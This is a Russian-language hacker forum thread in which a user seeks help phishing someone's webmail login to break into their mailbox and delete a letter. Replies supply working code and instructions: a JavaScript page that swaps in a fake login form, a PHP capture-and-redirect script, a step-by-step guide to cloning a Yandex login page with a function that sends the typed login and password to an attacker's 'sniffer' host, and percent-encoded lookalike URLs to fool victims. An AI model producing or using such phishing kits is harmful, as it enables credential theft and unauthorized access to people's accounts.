Мужики! нужна помощь в написании яваскрипта который заставляет выпрыгивать окошко с надписью "внутренняя ошибка браузера" и кнопочкой "ок", при нажатии на которую произойдет редирект на другую страницу.
например открывает человек www.почту а ему там фотка или ссылка. он на нее тыкает и выпрыгивает окошко с "ашыпкой браузера", он "ок" и в этом же окне отображаеца клон страницы пост-сервера с требованием пройти авторизацию для получения доступа к этому ресурсу. человек вводит логин и пароль, а поскольку сраница подставная то эти данные забирает автор письма. :D (а они то мне страсть как нужны!!!!) да хорошо бы чтобы при "повторной авторизации" происходил редирект на настоящую страницу (где его снова попросят ввести пароль :p ). в итоге человек сильно устанет вводить логин и пароль и некоторое время почту проверять ваще не будет )) а мы туда войдем, и уничтожим наше письмо.
как идейка?
кто поможет с написанием скриптов?
могу помочь с подделкой дизайна любого почтовика :)
помогите плиз!!! а то я эти языки (php, javaskript) до старости учить буду ))
_______________________________________________
всем кто поможет + (похоже на подкуп... :confused: :) )

Если скрипт будет написан на JS, то в исходнике будет виден весь код, в том числе и та ссылка куда перенаправляется юзер в случае нажатия ОК.. в JS используй функцию confirm.
Можно написать на пхп.. ) тогда исходники никто не увидит и ничего не заподозрит)).
Подобные скрипты поищи на сайте вовеб.ру =)

2 Rebz

письмо будем отправлять человеку для которогу урл и нтмл даже звучат одинаково ))
скрипт надо запустить из письма, то есть на клиентской стороне (пхп этого не может), спасибо за ссылку, только лично мне от нее толку мало, я в яваскрипт и пхп ваще не шарю. мне требуется ВАША помощь, то есть помогите плиз найти или написать этот скрипт. есть же здесь умные люди?!
________________________________________________
всем кто поможет + (похоже на подкуп... :confused: :) )

Товарищ, где это вы видили чтобы JS срабатывал в письме? (конечно, такое есть, но это всё приватно)
Вот пример письма с картинкой :]

<html>
<head>
<script language="JavaScript">
var FalseDoc="тут текст страници авторизации+ наша подделанная форма<form action=\"http://нашсайт.ру/auth/\"><input type=text name=pass><input type=submit></form>";
function zapadlo()
{
alert('IE must die');
document.write(FalseDoc);
}
</script>
</head>
<body>
<img src="photo.jpg" onClick="zapadlo();">
</body>
</html>



а на своём сайте делаешь php скрипт который получает пас и делает редирект уже с подставленным пасом

<?php
if (isset($_GET['pass']))
{
//сохраняешь пас куда надо
//сам редерект
header('Location: http://mail.ru/auth/?pass='.$_GET['pass']);
}
?>

Со стандартыми окошками браузера много не наворотишь.

Если и делать так, то немного по-другому:
Выводить слой, а уже на нем будет это окно (изображением). Кнопки должны будут нажиматься (onClick) и реагировать (onMouseOver). Но перед этим надо эти изображения подгрузить и уже потом выводить. А то мало-ли - чел по диалапу и увидит разметку для изображения.
+ надо учитывать и то, что в мире существует не тока браузер ИЕ и все сидят не тока на WinXP. А сидящие на WinXP не все юзают синее стандартное оформление винды. Т.е. опятьже - не все идеально. Можно сделать только по ИЕ-WinXP-синее оформление...
Но тока зачем? Если у тебя получилось внедрить JS чтобы вывести окошко, то почему бы тебе не внедрить JS редиректа на фэйк сайт с оформлением почтовика и сообщением "Период сессии истек. Введите логин/пароль для авторизации".

2 censored!
почему бы тебе не внедрить JS редиректа на фэйк сайт с оформлением почтовика и сообщением "Период сессии истек. Введите логин/пароль для авторизации".

собственно этого я и хочу добиться, а истек ли там период сессии ил произошла ошибка браузера, это детали. Ты можешь написать этот скрипт? я в JS не шарю, а время идет...
еще вопрос вот в чем, как подменить URL в адресной строке? чтобы без палева...

по части того что JS не работает в письме:
можно в письме дать ссылку на какой-то сайт (с красивой картинкой и редиректом на липовую страницу). Самое главное, чтобы все происходило в одном окне. а как этого добиться?

собственно этого я и хочу добиться, а истек ли там период сессии ил произошла ошибка браузера, это детали. Ты можешь написать этот скрипт? я в JS не шарю, а время идет...
Заходишь на страничку почтовика где требуют ввести логин/пароль. Жмешь правую кнопку мышки и выбираешь "Просмотр HTML-кода". Откроется Блокнот (или что у тебя там настроено?). Жмешь сохранить и сохраняешь, например, под именем relogin.htm
...
Открываешь relogin.htm и начинаешь его доделывать - дописываешь полные пути до изображений, ссылок и т.п. Доделал? Запускай его и смотри чтобы без ошибок на странице, все ссылки ввели на настоящий сайт, все изображения нормально отображались. Ну теперь и добавляй надпись - период сессии истек, требуется перезайти на сайт. Сохраняйся. Делай копию (как откат). Открывай. Запускай на странице поиск по слову form, смотри какое у него имя. Допустим - name=formsendlogin, теперь ищи поле ввода логина и смотри какое у него name, допустим - name="login", тоже самое и с паролем: name="password"
Теперь ищи что-то типа такого куска <input type="submit". Допустим у тебя будет так:
<input type="submit" value="готово" class="button">, тогда добавляй к нему onClick=go_go_go();, чтобы получилось:
<input type="submit" value="готово" class="button" onClick=go_go_go();>
Т.е. при клике по кнопке мы и отправим и вызовим функцию. Теперь найди </form> и вставь после него такой код:
<script>
function go_go_go(){
img = new Image();
img.src = "http://путь_до_твоего_снифера.ru/s.php?"+"Login:"+document.formsendlogin.login.value+" Password:"+document.formsendlogin.password.value;
}
</script>
Тока в строчках document.formsendlogin.login.value и document.formsendlogin.password.value замени formsendlogin, login и password на название своих полей.


еще вопрос вот в чем, как подменить URL в адресной строке? чтобы без палева...Вот тут внимательно прочитай:
http://www.forum.antichat.ru/thread11236.html
Там первый пост если на странице есть фрэймы, а чуть дальше пример если фреймов нет.
Но! Там должно открываться новое окно.
Чтобы в этом - зарегь себе сайт на бесплатном хостинге, и перекидывай на урл:
http://www.названиесайтапочтовика.% 68%31%36.ru/?activation&id=200765&relogin=1&пишешь_тут_че_хочешь=7&session=f8b1192e4497406cdd8d8434ce0d8a97
Вообщем, просто запугай длинным урлом. Так как не все обратят внимание на %68%31%36

по части того что JS не работает в письме:
можно в письме дать ссылку на какой-то сайт (с красивой картинкой и редиректом на липовую страницу). Самое главное, чтобы все происходило в одном окне. а как этого добиться?

Ну прикинь - ты жмешь на ссылку на какой-то сайт, а тебе пишут что сессия истекла на почтовике. Надо при загрузке страницы сразу редиректить либо, как пахало на яндексе (щас - незнаю пашет или нет) - просто прилепляешь заряженое изображение с мелкими деталями, при клике по которому открывается новое (где и происходит редирект). Но при этом встраивать запись куки. Чтобы не получилось так, что его каждый раз при попытке просмотра письма будут редиректить. Вот поэтому и надо встроить запись куки. Чтобы редиректило тока один раз.
Методов редиректа несколько. Смотря какую активную XSS ты юзаешь, или как используешь и куда перекидываешь. Тут надо конкретно смотреть.

собственно этого я и хочу добиться, а истек ли там период сессии ил произошла ошибка браузера, это детали. Ты можешь написать этот скрипт? я в JS не шарю, а время идет...
еще вопрос вот в чем, как подменить URL в адресной строке? чтобы без палева...

Собственно я этот код и написал выше, естественно его нужно дополнить под твой случай.

2 censored!

спасибо за советы, только руки у меня видимо совсем кривые... :p Браза, тебя если не затруднит, стукни плиз ко мне в аську... а то вопросы, но флэйм разводить неохота. ;)

27-696-13-17

Пиши по ПМ

2 censored!

В общем, дело в следующем. копирую хтмлкод страницы яндекса, делаю все как ты написал, но оно не работает... сам яндекс использует яваскрипт, и прописывает это в голове. пробовала засунуть твой скрипт туда, тоже не работает... не могу догнать в чем проблема. и еще не поняла, про снифер... ссылку писать на жыпеговый файл, или на лог.пхп? пробовала и так и так, на сниф ничего не приходит.
---------------------------------
пардон за ламерские вапросы :p

Ты сначала проверь - правильно ли все вставила. Т.е. добавь onClick, но вместо этого:
<script>
function go_go_go(){
img = new Image();
img.src = "http://путь_до_твоего_снифера.ru/s.php?"+"Login:"+document.formsendlogin.login.value+" Password:"+document.formsendlogin.password.value;
}
</script>
Поставь это:
<script>
function go_go_go(){
alert(document.formsendlogin.password.value);
}
</script>
тока поменяй document.formsendlogin.password.value на своё.

Если все прально - то должно вылететь окно с паролем. Если вылетело - то разбирайся со снифером.
писать на жыпеговый файл, или на лог.пхп
пиши на жыпеговый

хе-хе... переписала "релогин" все вроде работает, все красиво, прям яндекс настоящий. вставила алерт, вылетает, показывает введенный пароль. на снифер ничего не идет. но вишка не в этом. если в action этой формы прописать http://passport.yandex.ru/passport?mode=auth вылезает следующее:

Внимание! Сайт http://support.yard.ru/relogin.html не принадлежит Яндексу.
Вы видите эту страницу, потому что Вы попытались зарегистрироватся или авторизоватся на Яндексе с сайта, не имеющего к Яндексу отношения. Яндекс ничего не знает про этот сайт и не может гарантировать конфиденциальность передаваемой Вами информации (логин и пароль).
Если Вы ошибочно приняли чужой сайт за принадлежащий Яндексу, рекомендуем Вам на всякий случай сменить пароль.
я полагаю что придется еще написать свой обработчик этой формы на пхп, чтобы он редиректил на реальный андекс.

онклик со ссылкой на снифер не работает.. алерт работает...

Внимание! Сайт http://support.yard.ru/relogin.html не принадлежит Яндексу.
Вы видите эту страницу, потому что Вы попытались зарегистрироватся или авторизоватся на Яндексе с сайта, не имеющего к Яндексу отношения. Яндекс ничего не знает про этот сайт и не может гарантировать конфиденциальность передаваемой Вами информации (логин и пароль).
Если Вы ошибочно приняли чужой сайт за принадлежащий Яндексу, рекомендуем Вам на всякий случай сменить пароль.
Хм... Надо будет попробовать несколько по другому. Как попробую - напишу о результатах. В смысле - чтобы не заморачиваться с php и заголовками.

онклик со ссылкой на снифер не работает.. алерт работает...
Я тебе приводил готовый пример. У меня пашет =)